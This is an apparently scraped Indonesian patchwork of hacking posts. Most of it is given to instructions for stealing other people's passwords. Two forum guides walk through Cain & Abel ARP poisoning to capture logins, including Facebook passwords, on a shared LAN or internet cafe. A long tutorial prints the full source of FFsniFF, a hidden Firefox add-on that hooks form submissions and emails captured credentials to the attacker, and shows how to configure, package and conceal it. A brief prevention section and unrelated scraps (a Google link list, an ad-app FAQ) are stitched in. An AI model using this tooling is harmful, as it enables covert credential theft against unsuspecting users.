1. Install dulu Cain & Abel (login komputer harus Administrator)
2. Konfigurasikan network card dengan memilih menu "Configure", pilih network card yang sesuai
3. Start sniffer (klik tombol Start sniifer
4. klik tab Sniffer (yang atas), klik kanan di tengah field kosong, pilih Scan MAC Addresses

5. Kalo udah dapet MAC address-nya, pilih tab APR (bawah)
6. Klik field atas yang kosong, tekan tanda + (di bawah menubar)
7. Pilih salah satu (atau semuanya juga bisa sih) IP address, klik OK
8. Klik tombol Start/Stop APR di sebelah tombol Start/Stop Sniffer
9. Kalo udah, IP address yang lagi diracuni (poisoning) bakal keliatan
10. Sekarang, klik tab Password (di bawah), kalo kamu beruntung orang yang lagi login di komputer sebelah bisa keliatan password dan user ID-nya

Syarat-syarat yang harus dipenuhi adalah Orang yang akan kamu lihat passwordnya harus berada dalam 1 jaringan (LAN) atau 1 Warnet.

Selamat berhacking ria..

“Segala bentuk kerusakan, kehilangan dan sebagainya adalah tanggung jawab sendiri”

Dikenal juga sebagai Facebook Photo Album Downloader, facepad adalalah salah satu dari plugin mozilla firefox. Anda bisa mndownloadnya dari alamat ini https://addons.mozilla.org/en-US/firefox/search?q=facepad&cat=all. Mudah menggunakannya tinggal login ke facebook arahkan ke photo profile yang akan kita download. Misalnya photo teman kita klik terus sampai ada tulisan from album: contoh profile picture kemudian kita klik kanan akan muncul Download Album with facePAD. Klik kemudian kita tunggu sebentar. Selesai.

http://www.ilmuhacking.com/web-security/menjaring-password-dengan-firefox-sniffer/

Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semua addon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password pengguna ketika login ke email attacker, addon itu adalah FFsniFF.

Dalam artikel ini saya akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.


Sekilas tentang addon Firefox

Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.

Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:

1
2
3
4
5
6
7
8
9
10
11



exampleExt.xpi:
/install.rdf
/components/*
/components/cmdline.js
/defaults/
/defaults/preferences/*.js
/plugins/*
/chrome.manifest
/chrome/icons/default/*
/chrome/
/chrome/content/

install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.

Membuat paket instalasi ffsniff.xpi

Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh file sumber FFsniFF dari http://azurit.elbiahosting.sk/ffsniff/. Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:

1
2
3
4
5
6
7
8
9



pkg_creator.py
src/
src/install.rdf
src/chrome/
src/chrome/content/
src/chrome/content/ffsniff/
src/chrome/content/ffsniff/ffsniffOverlay.xul
src/chrome/content/ffsniff/ffsniffOverlay_orig.js
src/chrome/content/ffsniff/contents.rdf

File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus diubah dan dibungkus menjadi paket zippy (xpi). Sebenarnya untuk membuat paket zippy sudah disediakan script pkg_creator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.

Setelah source berhasil didownload, berikutnya saya harus membuat file ffsniffOverlay.js, caranya adalah dengan mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:

1
2
3
4
5
6
7



var send_from_host = "";
var send_from = "";
var send_to = "";
var subject = "";
var smtp_host = "";
var smtp_port = "";
var enable_hide = "";

Konfigurasi smtp untuk @ilmuhacking.com
MX record ilmuhacking.com

MX record ilmuhacking.com

Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama, jadi smtp_host saya isi dengan ilmuhacking.com. Pada domain lain biasanya mail server adalah mail.domainanda.com.

send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).

enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.

smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.

1
2
3
4
5
6
7



var send_from_host = "ilmuhacking.com";
var send_from = "testing@ilmuhacking.com";
var send_to = "testing@ilmuhacking.com";
var subject = "Log Firefox Sniffer";
var smtp_host = "ilmuhacking.com";
var smtp_port = "25";
var enable_hide = "no";

Konfigurasi smtp untuk @telkom.net

Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke telkom.net.Dengan cara yang sama saya harus membaca MX record dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:

1
2
3
4
5
6
7



var send_from_host = "telkom.net";
var send_from = "rizki.wicaksono@telkom.net";
var send_to = "rizki.wicaksono@telkom.net";
var subject = "Log Firefox Sniffer";
var smtp_host = "mx1.mail.plasa.com";
var smtp_port = "25";
var enable_hide = "no";

Membuat file ffsniff.jar

Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:

content/ffsniff/contents.rdf
content/ffsniff/ffsniffOverlay.js
content/ffsniff/ffsniffOverlay.xul

Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.
ffsniff.jar list files

ffsniff.jar list files

Membuat file ffsniff.xpi

Setelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:

install.rdf
chrome/ffsniff.jar

Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Gambar di bawah ini menunjukkan ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.

ffsniff.xpi file list

ffsniff.xpi file list

Instalasi Firefox Sniffer

Oke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. Kini saya bisa menginstall addon tersebut. Cara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file xpi pada addressbar firefox. Setelah muncul daftar file di firefox, klik file xpi yang akan diinstall. Cara instalasi FFsniFF diperlihatkan pada gambar di bawah ini. Setelah berhasil install jangan lupa untuk restart firefox anda.

instalasi firefox sniffer

instalasi firefox sniffer

Mencoba login ke yahoo

Kini saya akan mencoba login ke yahoo dengan username rizkiwicaksono. Setelah login, saya periksa inbox email testing@ilmuhacking.com. Ternyata email hasil sniff password ketika login ke yahoo sudah masuk. Isi emailnya terlihat pada gambar di bawah ini.
log sniffer email

log sniffer email

Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua field dengan tag input (input type=”xxx”) dari form, yaitu: password field, hidden field, text field, checkbox. Selain itu FFsniff juga mencatat URL, nama field, jenis dan nilainya. FFsniFF hanya mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.

Email Sniffer Log

Mari kita perhatikan email yang dikirimkan FFsniFF. Header lengkap email yang dikirim FFsniff adalah sebagai berikut:

1
2
3
4
5
6
7
8
9



Return-path:
Envelope-to: testing@ilmuhacking.com
Delivery-date: Fri, 27 Feb 2009 03:23:48 -0600
Received: from [202.43.xxx.xxx] (port=23982 helo=ilmuhacking.com)
by gator669.hostgator.com with esmtp (Exim 4.69)
(envelope-from )
id 1Lcywa-0002DK-Jj
for testing@ilmuhacking.com; Fri, 27 Feb 2009 03:23:48 -0600
Subject: Log Firefox Sniffer

Dalam email tersebut hanya ada 1 header Received, yaitu dari host 202.43.xxx.xxx (ip lengkap saya sensor). Hal ini menunjukkan bahwa smtp server yang saya pakai kebetulan adalah smtp server yang paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp server lain. Berikut ini adalah header email FFsniFF yang dikirim ke telkom.net:

Return-Path:
Received: from [125.160.17.193] (HELO mx1.mail.telkom.net)
by f1.c.plasa.com (CommuniGate Pro SMTP 4.3.9)
with ESMTPS id 690188427 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:05:27 +0700
Received: from mx1.mail.plasa.com ([222.124.18.71])
by mx1.mail.telkom.net with esmtp id 1LeiKy-0001qP-O1
for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:04:20 +0700
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AggYAH+MrUnKK6ce/2dsb2JhbACBTosbIQGGVoIPsFshAQKSPQEDgSwG
X-IronPort-AV: E=McAfee;i="5300,2777,5542"; a="119895912"
Received: from xxxxdtp.net.id (HELO telkom.net) ([202.43.xx.xx])
by mx1.mail.plasa.com with ESMTP; 04 Mar 2009 11:02:49 +0700
Subject: Log Firefox Sniffer
X-HAM-Check: YES
Date: Wed, 04 Mar 2009 11:05:27 +0700
Message-ID:

Dalam email ke telkom.net ada 3 header Received. Yang pertama adalah mx1.mail.plasa.com, ini adalah smtp server yang saya pakai di FFsniFF. Kemudian dari situ email dioper ke mx1.mail.telkom.net, dan terakhir dioper lagi ke f1.c.plasa.com, yang merupakan smtp server yang paling dekat dengan si penerima. Jadi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp server f1.c.plasa.com. Namun karena MX record telkom.net menunjuk ke mx1.mail.telkom.net lebih baik saya pakai smtp server itu, walaupun perlu dioper sebanyak 2 kali untuk sampai di tujuan.

FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication sebelum mengirimkan email. SMTP server tidak mungkin menolak email yang ditujukan untuk domain yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous (tanpa authentication), sebab bila smtp server menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke domain itu.

Karena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain ilmuhacking.com karena smtp server tersebut kemungkinan besar akan menolak dijadikan titik relay pengiriman email ke domain lain. Bila ingin mengirimkan email untuk domain lain tidak bisa secara anonymous, sebelumnya harus memasukkan perintah smtp AUTH LOGIN dan memasukkan username/password dalam base64. Saya tidak akan menjelaskan terlalu panjang soal email, di lain kesempatan akan saya bahas detil cara kerja email.

Pencegahan

Bad guys already know about FFsniff since 3 years ago

FFsniff diciptakan pada bulan maret 2006, tepat 3 tahun yang lalu sehingga addon ini sudah dikenal luas sebagai salah satu tools hacking. Sekarang bagaimana caranya agar kita tidak menjadi korban addon ini?
Berikut ini tips agar tidak menjadi korban FFsniff:

* Jangan sembarangan menginstall addon yang tidak anda kenal. Install addon hanya dari situs resmi Firefox Addon https://addons.mozilla.org/
* Install Addon hanya dari situs yang menggunakan https. Penggunaan https ini sangat penting agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah diracuni spyware. Mengenai pentingnya https ini bisa anda baca di artikel: understanding https
firefox safe mode

firefox safe mode
* Bila anda berada di komputer publik, gunakan Firefox dalam Safe Mode (mode aman). Mode ini adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
* Walaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia tidak mungkin bisa bersembunyi di file system. Jika anda ragu apakah firefox anda bersih dari FFsniFF, silakan buka folder Profile Mozilla Firefox anda. Biasanya di:

1



C:\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\\extensions\

firefox extension folder

firefox extension folder

Kemudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. Atau anda juga bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff.

How FFsniff Works

Saya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password ketika ada yang login di firefox yang telah dipasang addon ini. Kini saatnya saya menjelaskan cara kerja FFsniff ini. Inti dari FFsniff ini ada pada file ffsniffOverlay.js. File ini berisi semua code yang melakukan sniffing. Berikut adalah source code lengkap ffsniffOverlay.js.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128



var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
var transport = "";
var outstream = "";
var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
var stream = "";
// find out FF version
var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);
var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);

var data = "";
var data0 = "EHLO " + send_from_host + "\r\n"
var data1 = "MAIL FROM: <" + send_from + ">\r\n"
var data2 = "RCPT TO: <" + send_to + ">\r\n"
var data3 = "DATA\r\n"
var data4 = "\r\n.\r\n"
var data5 = "QUIT\r\n"
function send_data() {
transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
outstream = transport.openOutputStream(0, 0, 0);
stream = transport.openInputStream(0, 0, 0);
instream.init(stream);

// this will avoid 'Improper use of SMTP command pipelining'
// error on SMTP servers
outstream.write(data0, data0.length);
while (instream.available() == 0) {}
instream.read(instream.available());

outstream.write(data1, data1.length);
while (instream.available() == 0) {}
instream.read(instream.available());

outstream.write(data2, data2.length);
while (instream.available() == 0) {}
instream.read(instream.available());

outstream.write(data3, data3.length);
while (instream.available() == 0) {}
instream.read(instream.available());

outstream.write(data, data.length);
// don't read here cos no data was send to us
//while (instream.available() == 0) {}
//instream.read(instream.available());

outstream.write(data4, data4.length);
while (instream.available() == 0) {}
instream.read(instream.available());

outstream.write(data5, data5.length);
while (instream.available() == 0) {}

outstream.close();
instream.close();
}
if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
var workingThread = function() {
};

workingThread.prototype = {
run: function() {
send_data();
}
};
} else {
var runnable = {
run: function() {
send_data();
}
}
}
function sniff() {
// if we are running under 3.0 or later
if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);
thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);
} else {
var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
}
}

function do_sniff() {
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + ":" + hesla[i].value + "\n";
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
sniff()
}
}
function hide_me() {
var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
var root = RDFService.GetResource("urn:mozilla:item:root");
var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
Container.Init(extensionDS, root);
var elements = Container.GetElements();
while (elements.hasMoreElements()) {
var element = elements.getNext();
var name = "";
var target = extensionDS.GetTarget(element, nameArc, true);
if (target) {
name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
if (name == "FFsniFF") {
Container.RemoveElement(element, true);
}
}
}
}
if (enable_hide == "yes") {
hide_me();
}
window.addEventListener("submit", do_sniff, false);

Perhatikan baris ke-127 pada source di atas, bila enable_hide diset “yes”, maka ffsniff akan menjalankan fungsi hide_me(). hide_me() bertugas menghilangkan FFsniff dari daftar addon agar kehadirannya tidak disadari pengguna. Cara menyembunyikan diri adalah dengan cara menjalankan fungsi Container.RemoveElement (baris ke-122) hanya bila element itu bernama “FFsniFF”.
how ffsniff works

how ffsniff works

Fungsi sniffing sesungguhnya ada pada baris terakhir. Pada baris terakhir, terdapat fungsi addEventListener(). Fungsi ini berguna untuk mengaitkan event submit dengan fungsi do_sniff. Artinya fungsi do_sniff akan dijalankan setiap kali terjadi event submit. Event submit akan terjadi bila ada request POST di browser, antara lain dengan melalui klik tombol bertipe submit (input type=”submit”). Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh javascript. Dengan cara apapun, bila terjadi request POST di browser, event submit akan terjadi, dan artinya fungsi do_sniff juga akan dipanggil. Untuk lebih jelasnya perhatikan gambar di atas.

Kini fokus perhatian kita pindah ke fungsi do_sniff (baris ke-84). Dalam fungsi sniff, ffsniffer mengambil daftar semua tag yang ada dengan fungsi window.content.document.getElementsByTagName(”input”). Kemudian semua field tersebut akan digabung dalam variabel string data. Hanya bila dalam form tersebut terdapat password field (input type=”password”), maka ffsniffer akan mengirimkan email, bila hanya form biasa (bukan form login), ffsniffer tidak akan mengirim email.

Bila mengandung password field, berikutnya fungsi sniff (baris ke-73) akan dijalankan. Fungsi sniff ini tugasnya hanya membuat dan menjalankan thread. Thread tersebut bertugas melakukan pengiriman email dengan memanggil fungsi send_data (baris ke-17). Fungsi send_data akan membuka koneksi tcp ke smtp server, kemudian mengirimkan perintah smtp untuk mengirim email. Dengan menggunakan sniffer Wireshark, berikut adalah komunikasi yang terjadi ketika email dikirim ke telkom.net:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34



220-mx1.mail.plasa.com ESMTP
220 UBE, porn, and abusive content not allowed
EHLO telkom.net
250-mx1.mail.plasa.com
250-8BITMIME
250 SIZE 20971520
MAIL FROM:
250 sender ok
RCPT TO:
250 recipient ok
DATA
354 go ahead
Subject: Log Firefox Sniffer

https://login.yahoo.com/config/login?
type:name:value
---------------
hidden:.tries:2
hidden:.intl:us
hidden:.u:6220o3t4qrv31
hidden:.v:0
hidden:.challenge:Uhh09ZXeYC4rgGkrSkirh.TXeHk_
hidden:hasMsgr:0
hidden:.chkP:Y
hidden:.done:http://my.yahoo.com
hidden:.pd:_ver=0&c=&ivt=&sg=
text:login:rizkiwicaksono
password:passwd:inipasswordku
checkbox:.persistent:y
submit:.save:Sign In
.
250 ok: Message 119895912 accepted
221 mx1.mail.plasa.com
QUIT

Sedangkan komunikasi yang terjadi ketika email dikirim ke @ilmuhacking.com adalah:

220-gator669.hostgator.com ESMTP Exim 4.69 #1 Tue, 03 Mar 2009 22:15:33 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
EHLO ilmuhacking.com
250-gator669.hostgator.com Hello ilmuhacking.com [202.43.xxx.xxx]
250-SIZE 52428800
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
MAIL FROM:
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Subject: Log Firefox Sniffer

https://login.yahoo.com/config/login?
type:name:value
---------------
hidden:.tries:1
hidden:.intl:us
hidden:.u:eljvtc94qs023
hidden:.v:0
hidden:.challenge:7FWzfTnmnC3Njv1YadcWnM61LyIw
hidden:hasMsgr:0
hidden:.chkP:Y
hidden:.done:http://my.yahoo.com
hidden:.pd:_ver=0&c=&ivt=&sg=
text:login:rizkiwicaksono
password:passwd:inipasswordakujuga
checkbox:.persistent:y
submit:.save:Sign In
.
250 OK id=1LeiW6-0002zu-LA
QUIT
221 gator669.hostgator.com closing connection

Dengan selesainya eksekusi send_data() maka ffsniff telah selesai menjalankan tugasnya mengirim email. Selanjutnya ffsniff akan “tidur” menunggu dipanggil oleh event submit dan mulai kembali proses penyadapan password.

http://www.4shared.com/file/81512677/36649d2a/fbi_tools_11in1.html?s=1

- ADS Locator (Alternate Data Streams)
- Disc Investigator 1.4 (File-Slack-Analyze)
- Historian 1.4 (Browser Analyze)
- Live View 0.6 (System Analyze)
- MUI Cacheview 1.00 (Registry Analyze)
- Networkminer 0.85 (Network Analyze)
- Regripper 2.02 (Registry Analyze)
- Systemreport 2.54 (PC Analyze)
- USB-History R1 (USB-Stick-Analyze)
- Windows File Analyzer (File Analyze)
- Winpcap 4.02 (Network

Google™ Earth: http://earth.google.com/
Google™ Toolbar for IE - Link will only work in IE: http://toolbar.google.com/index_xp.html
Add Buttons to Your Google™ Toolbar: http://toolbar.google.com/buttons/gallery
Google™ Toolbar for Firefox: http://www.google.com/tools/firefox/toolbar/
Google™ Extensions for Firefox: http://www.google.com/tools/firefox/index.html
Google™ Picasa - Image Editor: http://picasa.google.co.uk/
Google™ Desktop BETA: http://desktop.google.com/
Google™ Options: http://www.google.co.uk/intl/en/options/
Google™ Search with custom languages:
Bork, Bork, Bork! : http://www.google.com/intl/xx-bork/
Elmer Fudd: http://www.google.com/intl/xx-elmer/
Hacker: http://www.google.com/intl/xx-Hacker/
Pig Latin: http://www.google.com/intl/xx-piglatin/
Google™ Mini: http://www.google.co.uk/enterprise/mini/
Google™ Search Appliance: http://www.google.co.uk/enterprise/gsa/index.html
Google™ Adsense: https://www.google.com/adsense/?hl=en_GB&sourceid=aso&subid=EN-GB-ET-BSOL&medium=link
Google™ Specific Searches:
MAC Specific: http://www.google.co.uk/mac
BSD Specific: http://www.google.co.uk/bsd
Linux Specific: http://www.google.co.uk/linux
Microsoft Specific: http://www.google.co.uk/microsoft
U.S. Government Specific: http://www.google.co.uk/unclesam
University Specific: http://www.google.co.uk/options/universities.html
Google™ Webaccelerator: http://webaccelerator.google.com/
Google™ Notebook: http://www.google.com/notebook/
Google™ Trends: http://www.google.com/trends
Google™ Picasa for Linux: http://picasa.google.com/linux/
Google™ Mars: http://www.google.com/mars/
Google™ MACwidgets: http://www.google.com/macwidgets/index.html
Google™ Pack: http://pack.google.com
Google™ Labs: http://labs.google.com/
Google™ Transit - Route Planner (Not sure but looks like America only): http://www.google.com/transit
Google™ Ride Finder - America Only: http://labs.google.com/ridefinder
Google™ Suggest - As you type, Google™ will offer suggestions: http://www.google.com/webhp?complete=1
Froogle™ for Mobile: http://labs.google.com/frooglewml.html
Froogle™ for Mobile - For UK: http://labs.google.com/intl/uk/frooglewml.html
Google™ Sets - Automatically create sets of items: http://labs.google.com/sets
Want to work at Google™ ?: http://labs.google.com/why-google.html
Google™ Video: http://video.google.com/
Google™ Maps: http://maps.google.com/
Google™ SMS: http://www.google.com/sms/
Google™ Groups: http://groups.google.com/
Google™ Define - Dictionary (example of tes given): http://www.google.com/search?q=define+tes
Google™ Blog Search: http://www.google.com/blogsearch
Google™ Book Search: http://books.google.com/
Google™ Directory: http://www.google.com/dirhp
Google™ Scholar: http://scholar.google.com/
Google™ News: http://news.google.com
Google™ Blogger: http://www.blogger.com/
Google™ Sketch-Up: http://sketchup.google.com/
Google™ Code: http://code.google.com/
Google™ Business Solutions: http://www.google.com/services/
Google™ Preferences: http://www.google.com/preferences
Google™ Error: http://www.google.com/warez
Google™ Alerts: http://www.google.com/alerts?hl=en
Google™ AdWords: https://adwords.google.com/
dan terakhir: Google™ Search Engine - The Best Around: http://www.google.com

* Report this post
* Reply with quote

Nyedot Password FB pake Cain & abel

Postby PlusKlinik on 30 Sep 2009, 08:25
Hm :P . Langsung aja nich banyak Kata Temen2x yang sibuk nyari Password FB orang pake Tools2x yang laen . dan katanya Cain & abel gax bias detect Password FB . ni saya punya Tutorial sedikit cara Nyedot Password FB pake Cain& abel . ya mungkin K’k2x dan Temen2x yg laen sebagian sudah pada ada yang tau , mungkin yg sudah sudah pada tau gax perlu baca lagi Kasih Comen aja Ke saya … hahahha :D . Cara jalanin nya sama Aja kyk jlanin Cain & Abel seperti biasa .

1. Download dulu Tools Cain & abel di Home http://www.oxid.it
2. nah kalau sudah di download , install Cain & abel (gax mungkin kan gax ada yang tau cara nginstall software) Di cain & abel entu sudah tersedia t software tambahan yaitu “wincap” nah itu install juga Coz klaw gax ada itu “wincap” nya Cain gax bias Jlan.
3. Nah kalau sudah Di Install semua saat nya Memulai Penulusuran :

1. Jalan kan Cain & abel .
2. Kalau ada perintah datang saat menjalan kan Cain abel Pilih “UNLOCK”
3. Jika suda masuk pada cain abel Pilih TAB “configure” akan Muncul TAB Baru cari IP yang terhubung Dengan IP Komputer lain dan kalau sudah OK.
4. Lalu pilih “start/stop sniffer” pada tab di atas atau gambar berwarna Hijau tuk Memulai Atau Menjalan kan Cain .
5. Setelah memilih gambar tersebut Lanjukan dengan Memilih “star/stop APR” yang berwarna kuning di sebelah “start/stop sniffer”
6. Lanjut tuk memilih gambar Dengan Tanda Plus/tambah maka aka ada pilihan Baru dan Klik OK maka Otomatis Cain akan Menscan Mac dan IP address orang lain .
7. Lanjut Kita Pilih “Sniffer “ pada tab
8. Selanjutnya pilih status yang ada pada Tab sniffer dan pilih Gambar Plus/Tambah lagi. Maka akan muncul “new ARP poison Rounting”
9. Pilih/Blok Semua Alamat IP yang ada . Pilih Ok .
10. Lanjut Pilih “Password” pada tab yang ada di bawah .
11. Dan Pilih (HTTP) yang ada pada Opsi Password .
12. Tungguin dech tu alamat email dan Password yang bakaln masuk .
13. Terserah dech tu email mau di apain.

Sekian Postingan saya , semoga BermanFaat Bagi Temen2x yang belum tau ,
Maaf kalau di posstingn saya ada yang kurang dan ada yang salah , Kesempurnaan hanya lah milik Allah swt ……

ma'af kalau gax masukin Gamabar nya .... coz saya gax tau cara masukin na (jujur)
pleas saya tu begok .... kalau ada yang tau temen2x kasih tau ya ... caranya msukin gambar ke posting jasakom ini ..

Q : Apa itu aplikasi Bagi-Bagi ?
A : Adalah jaringan media periklanan yang mempertemukan antar pemasang iklan (advertiser) dan pembacanya. Simpelnya adalah, Anda di bayar untuk membaca iklan atau menjawab iklan yang di tayangkan.
Bila Anda memasang iklan di sini, maka iklan Anda akan di baca dengan antusias oleh pengguna aplikasi ini yang sampai saat ini berjumlah 2,585 orang.

Q : Siapa target pengguna aplikasi ini?
A : Para pemasang iklan online (Advertiser) dan para pengguna facebook (FBers) yang menginginkan penghasilan tambahan.

Q : Dapatkah saya bertindak sebagai pemasang iklan (advertiser) dan juga sebagai pembaca iklan?
A : Tentu saja, Anda dapat berperan sebagai keduanya.

Q : Apa keuntungan pemasang iklan (Advertiser) di sini di bandingkan di tempat lain?
A: Di sini iklan Anda tidak hanya sekedar di klik saja oleh pembacanya namun akan di jawab dan di baca dengan antusias oleh pengguna aplikasi ini.

Q : Mengapa mereka begitu antusias membaca iklan saya?
A: Karena di sini para pembaca (FBers) mendapatkan komisi setiap iklan yang mereka baca atau jawab.

Q : Saya melihat istilah 'Click Ads' dan 'Qads', apa maksudnya?
